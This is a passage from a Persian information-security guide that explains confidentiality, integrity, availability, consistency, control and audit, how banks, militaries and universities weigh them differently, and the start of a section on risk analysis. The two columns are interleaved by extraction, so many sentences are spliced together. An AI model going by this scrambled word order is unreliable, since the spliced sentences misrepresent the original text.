‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٤٦‬‬

‫ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﺎﻣﻴﺪ‪.‬‬ ‫ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ‬

‫ﻛﻨﺘﺮﻝ‬ ‫ﺩﺭ ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﮔﺴﺘﺮﺩﻩ‪ ،‬ﮔﻮﻧﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﻭﺟـﻮﺩ‬


‫‪٧١‬‬
‫ﺿﺎﺑﻄﻪﻣﻨﺪ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ‪ .‬ﺍﮔﺮ ﺍﻓﺮﺍﺩ )ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ(‬ ‫ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﻛﻨﻨﺪ‪:‬‬
‫ﻧﺎﺷـﻨﺎﺧﺘﻪ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺷــﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷــﻨﺪ‬ ‫‪٧٢‬‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ ﻭ ﺷﻤﺎ ﺭﺍﺟﻊ ﺑﻪ ﭼﮕﻮﻧﮕﻲ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﻳـﺎ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ‬
‫ﻭﺭﻭﺩ ﺁﻧﻬﺎ‪ ،‬ﺁﻧﭽﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷـﻨﺪ‪ ،‬ﻭ ﺍﻓـﺮﺍﺩ‬
‫ﺗﻮﺳـﻂ ﺍﺷﺨﺎﺻـﻲ ﻛـﻪ ﺍﺯ ﺟﺎﻧـﺐ ﻣﺎﻟـﻚ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺠــﻮﺯ‬
‫ﻻ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺍﺣﺴﺎﺱ‬ ‫ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﮔﻮﻧﺔ ﺍﻣﻨﻴﺖ ﻧﻪﺗﻨﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻠﻲ ﺍﺯ‬
‫ﻧﮕﺮﺍﻧﻲ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺟﺒـﺮﺍﻥ ﭼﻨـﻴﻦ ﻣـﺸﻜﻼﺗﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺑﻠﻜﻪ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﻣﻨﻔـﺮﺩ‬
‫ﻭﻗﺘﮕﻴﺮ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ‪ .‬ﺷﺎﻳﺪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ ﺍﺯ‬
‫ﻱ ﺧﻮﺩ ﺁﺳﻴﺒﻲ ﺩﺭ ﭘـﻲ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺧﻮﺩ ﹺ‬
‫ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﻭ ﺗـﺎﺯﻩ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﻛـﻪ ﺗﻐﻴﻴـﺮ‬
‫ﻭﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﭘـﻲ‬
‫ﻣﻬﻤﻲ ﺭﺥ ﻧﺪﺍﺩﻩ ‪ -‬ﺣﺘﻲ ﺍﮔﺮ ﻭﺍﻗﻌﹰﺎ ﻫﻴﭻ ﺍﺗﻔﺎﻗﻲ ﻧﻴﺎﻓﺘﺎﺩﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺩ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﺎﺯﺑﻴﻨﻲ‬ ‫‪٧٣‬‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ )ﺗﻤﺎﻣﻴﺖ(‬
‫ﺑﻪ ﻫﻤﺎﻥ ﻣﻴﺰﺍﻥ ﻛﻪ ﻧﮕﺮﺍﻥ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ‬
‫ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ )ﻣﻨﺠﻤﻠﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ( ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﺮﮔﻮﻧﻪ ﺣﺬﻑ‬
‫ﻫﺴﺘﻴﺪ‪ ،‬ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻣﻜـﺎﻥ ﻭﻗـﻮﻉ ﺍﺷـﺘﺒﺎﻫﺎﺕ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺍﻋﻤـﺎﻝ‬
‫ﻭ ﺗﻐﻴﻴﺮ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﻣﺎﻟﻚ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ‪ .‬ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﺑﺪﺧﻮﺍﻫﺎﻧﻪ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻣﺠـﺎﺯ ﻧﻴـﺰ ﺗﻮﺟـﻪ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ ﭼﻨـﻴﻦ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﺣﺴﺎﺑﺪﺍﺭﻱ‪ ،‬ﻧﺴﺨﻪﻫﺎﻱ‬
‫ﺷﺮﺍﻳﻄﻲ ﺑﺎﻳﺪ ﺁﻧﭽﻪ ﻛﻪ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‪ ،‬ﻓﺮﺩ ﺍﻧﺠﺎﻡﺩﻫﻨﺪﻩ ﻭ ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﭘﺸﺘﻴﺒﺎﻥ‪ ،‬ﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺁﻧﺮﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻄﻤﺌﻦ ﺑﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﺘﺎﻳﺞ‪ ،‬ﺩﺍﺷﺘﻦ ﺳﻮﺍﺑﻖ ﻭ ﺛﺒﺘﻬﺎﻱ ﺗﺨﺮﻳـﺐﻧـﺸﺪﻧﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺩﺭ‬ ‫‪٧٤‬‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ‬
‫ﺳﻴﺴﺘﻢ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻓـﺮﺍﺩ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺪﻣﺎﺗﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﺑـﺪﻭﻥ ﺗـﺼﺪﻳﻖ‬
‫ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺣـﺴﺎﺱ‪ ،‬ﺷـﻴﻮﺓ ﺑـﺎﺯﺑﻴﻨﻲ‬ ‫ﺍﻋﺘﺒﺎﺭ ﺗﻨﺰﻝ ﭘﻴﺪﺍ ﻧﻜﻨﻨﺪ ﻭ ﺗﺨﺮﻳﺐ ﻧﺸﻮﻧﺪ‪ .‬ﺍﮔـﺮ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﮔـﺴﺘﺮﺩﻩ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺑﻌـﺪ ﺍﺯ ﺗﻨﻈـﻴﻢ‬ ‫ﻛﺎﺭﺑ ﹺﺮ ﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺩﺳﺘﺮﺱ‬
‫ﻭﺿﻌﻴﺖ ﺳﻴﺴﺘﻢ ﺑـﻪ ﻳـﻚ ﺣﺎﻟـﺖ ﺟﺪﻳـﺪ‪ ،‬ﺍﺟـﺎﺯﺓ ﺑﺎﺯﮔـﺸﺖ ﺑـﻪ‬ ‫ﻧﺒﺎﺷﻨﺪ‪ ،‬ﻧﺘﻴﺠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ ﺭﻭﻱ‬
‫ﻭﺿﻌﻴﺖ ﺍﻭﻟﻴﻪ ﺭﺍ ﻧﻴﺰ ﺑﺪﻫﺪ‪.‬‬ ‫ﺳﻴﺴﺘﻢ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ ﻧﺎﺧﻮﺷﺎﻳﻨﺪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﻛﻠﻴﺔ ﺍﻳﻦ ﻭﺟﻮﻩ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﻧـﺪ‪ ،‬ﺍﻣـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫‪٧٥‬‬
‫ﺛﺒﺎﺕ ﻭ ﺳﺎﺯﮔﺎﺭﻱ )ﭘﺎﻳﺪﺍﺭﻱ(‬
‫ﻣﺨﺘﻠﻒ ﺑﻪ ﻫﺮﻳﻚ ﺑﺎ ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻲﻧﮕﺮﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ‬
‫ﺍﺧﺘﻼﻑ ﺑﺪﻟﻴﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﻣﻼﺣﻈـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ ﺭﻓﺘﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﺎﮔﻬـﺎﻥ‬
‫ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ ﻭ ﺑﺎﻳـﺪ ﺍﻭﻟﻮﻳﺘﻬـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻗﺒﻞ ﻋﻤﻞ ﻛﻨـﺪ ‪ -‬ﺧـﺼﻮﺻﹰﺎ ﺑﻌـﺪ ﺍﺯ‬
‫ﺣﺴﺐ ﺁﻥ ﻣﻼﺣﻈﺎﺕ ﺗﻌﻴﻴﻦ ﻛﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪:‬‬
‫ﻳﻚ ﺍﺭﺗﻘﺎ ﻳﺎ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ‪ -‬ﻣﺸﻜﻼﺕ ﺯﻳﺎﺩﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺭﺥ‬
‫ﻣﺤﻴﻂ ﺑﺎﻧﻜﺪﺍﺭﻱ‬ ‫ﺩﻫﺪ‪ .‬ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﺍﮔﺮ ﻓﺮﻣﺎﻥ "‪ "ls‬ﺑﻄـﻮﺭ ﺗـﺼﺎﺩﻓﻲ ﺣـﺬﻑ ﺷـﻮﺩ‬
‫ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ‪ ،‬ﻳﻜﭙـﺎﺭﭼﮕﻲ‪ ،‬ﻛﻨﺘـﺮﻝ‪ ،‬ﻭ ﺑـﺎﺯﺑﻴﻨﻲ‪ ،‬ﺍﺯ ﺍﺻـﻮﻝ‬ ‫ﻫﻨﮕﺎﻡ ﻓﻬﺮﺳﺖﮔﻴﺮﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻲﺍﻓﺘـﺪ! ﺍﻳـﻦ ﮔﻮﻧـﺔ‬
‫ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ‬
‫ﺩﺭ ﺩﺭﺟﺔ ﺑﻌﺪﻱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺭﻭﻳﻜﺮﺩ ‪ COBIT‬ﺩﺭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪:‬‬ ‫‪۷۱‬‬
‫ﻣﺤﻴﻂ ﻧﻈﺎﻣﻲ‬ ‫‪http://www.isaca.org/cobit.htm‬‬
‫ﺩﺭ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺩﻓــﺎﻋﻲ ﻣﻠــﻲ ﻛــﻪ ﺣــﺎﻭﻱ ﺍﻃﻼﻋــﺎﺕ‬ ‫‪72‬‬ ‫‪Confidentiality‬‬
‫‪73‬‬ ‫‪Integrity‬‬
‫ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺭ ﺍﻭﻟﻴﻦ ﺩﺭﺟﺔ ﺍﻫﻤﻴـﺖ ﻗـﺮﺍﺭ‬ ‫‪74‬‬ ‫‪Availability‬‬
‫‪75‬‬ ‫‪Consistency‬‬
‫‪١٤٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺷﺮﻛﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ ﻭ ﻣﻤﻴـﺰﻱ ﺩﺍﺭﺍﻱ ﺗﻴﻤﻬـﺎﻱ ﻣﺘـﺸﻜﻞ ﺍﺯ‬ ‫ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺭ ﺩﺭﺟﺔ ﺁﺧﺮ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﺤﻴﻄﻬﺎﻱ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻣﻨﻴـﺖ ﻧـﺼﺒﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬ ‫ﺑﺴﻴﺎﺭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣﻘﺎﻣـﺎﺕ ﺭﺳـﻤﻲ ﺗـﺮﺟﻴﺢ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ‪.‬‬ ‫ﺩﻫﻨﺪ ﻛﻪ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺭﺍ ﻣﻨﻔﺠﺮ ﻛﻨﻨﺪ ﺗﺎ ﺍﺟـﺎﺯﻩ ﻧـﺪﺍﺩﻩ ﺑﺎﺷـﻨﺪ‬
‫ﺍﻃﻼﻋﺖ ﺑﺪﺳﺖ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻴﺎﻓﺘﺪ‪.‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺷـﺮﻛﺖ ﻛـﻮﭼﻜﺘﺮ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺎ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﺑﺨﺶ‬ ‫ﻣﺤﻴﻂ ﺩﺍﻧﺸﮕﺎﻫﻲ‬
‫ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻧﺒﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷـﻮﺩ ﺑﺨـﺶ‬ ‫ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﻭﻡ ﻛﺘﺎﺏ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻮﺭ ﻛﻨﻴـﺪ‬ ‫ﻣﻬﻤﺘﺮﻳﻦ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻫﺴﺘﻨﺪ‪ .‬ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻛﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻴﺶ ﺍﺯ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﺝ ﺷﻤﺎ ﻭﺍﺭﺩ ﺟﺰﺋﻴﺎﺕ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ‬ ‫ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴـﺎﺯ ﺩﺍﺭﻧـﺪ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻮﻝ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺗﻨﻈﻴﻢ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﺘﺎﻥ‬ ‫ﻣﺮﺍﺗﺐ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺑﺘﻮﺍﻧﻨـﺪ ﺯﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪.‬‬ ‫ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ‪.‬‬

‫ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬ ‫ﺍﮔﺮ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﻣﻨﻴﺖ ﻫﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﺳﭙﺲ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ‪ ،‬ﻓﻬﺮﺳﺘﻲ ﻃﻮﻻﻧﻲ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ‬
‫ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ‪ .‬ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﻣﻄﺎﻟﺐ ﻣﺸﺮﻭﺡ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﭘﻴﺶ ﺭﻭﻱ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ‪ -‬ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ‬


‫ﻟﺰﻭﻣﹰﺎ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﻳﺪ ﻳﺎ ﺑﺎ ﺗﻤﺎﻡ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠـﻪ ﻛﻨﻴـﺪ‪ .‬ﭼـﻮﻥ ﺯﻣـﺎﻥ ﻭ‬
‫ﭘﻮﻝ ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻛﻨﻮﻥ ﺷـﻤﺎ ﺑـﻪ ﻳـﻚ ﺭﻭﺵ ﺩﺭﺟـﻪﺑﻨـﺪﻱ‬ ‫ﺍﻋﺘﻤﺎﺩ‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ‬
‫ﻻ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑـﺎ ﻋﻨـﺎﻭﻳﻦ‬ ‫ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﺁﺛﺎﺭ ﻭ ﺍﺣﺘﻤﺎﻝ ﻛﺪﺍﻡ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺑﺰﺍﺭﻫﺎﻱ‬
‫"ﺍﻣﻦ" ﻭ "ﻧﺎﺍﻣﻦ" ﺧﻄﺎﺏ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜﻪ ﻛﻠﻤﺔ "ﺍﻋﺘﻤـﺎﺩ" ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻓﻨﻲ ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪ ،‬ﺩﺭ ﻣﻘﺎﺑﻞ ﻛﺪﺍﻣﻬﺎ ﺍﺯ ﺑﻴﻤﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﻭ‬
‫ﺗﻮﺿﻴﺢ ﺳﻄﺢ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻭﻗﻮﻉ ﭼﻪ ﻣﻮﺍﺭﺩﻱ ﺭﺍ ﺻﺮﻓﹰﺎ ﺑﭙﺬﻳﺮﻳﺪ‪ .‬ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ‬
‫ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻖ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺑﺎ ﻛﺪﺍﻡ ﻣﺨﺎﻃﺮﻩ ﺑﺎﻳﺪ ﻣﻘﺎﺑﻠﻪ ﻛـﺮﺩ ﻭ ﻛـﺪﺍﻣﻴﻚ ﺭﺍ‬
